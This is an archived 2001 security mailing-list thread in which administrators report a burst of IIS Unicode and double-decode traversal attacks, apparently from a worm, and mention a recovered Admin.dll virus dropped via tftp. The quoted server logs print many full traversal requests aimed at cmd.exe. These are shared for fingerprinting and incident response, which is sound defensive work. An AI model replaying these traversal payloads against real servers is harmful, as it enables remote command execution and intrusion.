We're seeing much of the same traffic. We've recovered a file called Admin.dll from the /scripts directory in the web tree. This file was copied there by means of tftp and then executed with a second web request. Crude analysis of Admin.dll shows that it's calling itself: "Concept Virus(CV) V.5, Copyright(C)2001 R.P.China" I'll provide more information later when I've had a chance to examine it more intently. Eric Jacobsen jacobsenat_private "Portnoy, Gary" wrote: > > Greetings, > > I am suddenly seeing hundreds of Unicode traversal requests coming in from > all over the world, many of them from previous CodeRed victims. I am > guessing someone changed CodeBlue to make it spread faster, because before I > saw maybe 1 or 2 CodeBlue attempts a day, and so far i've seen at least 20 > in the last hour. Just a a way to help fingerprint it, a few of the > attempted exploits use the multiple decode vulnerability.... > > -Gary- > > 12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir > HTTP/1.0" 404 287 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /MSADC/root.exe?/c+dir > HTTP/1.0" 404 285 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 326 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 326 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy > stem32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" > "-" > 12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-" > > Gary Portnoy > Network Administrator > gportnoyat_private > > PGP Fingerprint: 9D69 6A39 642D 78FD 207C 307D B37D E01A 2E89 9D2C > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 08:39:12 PDT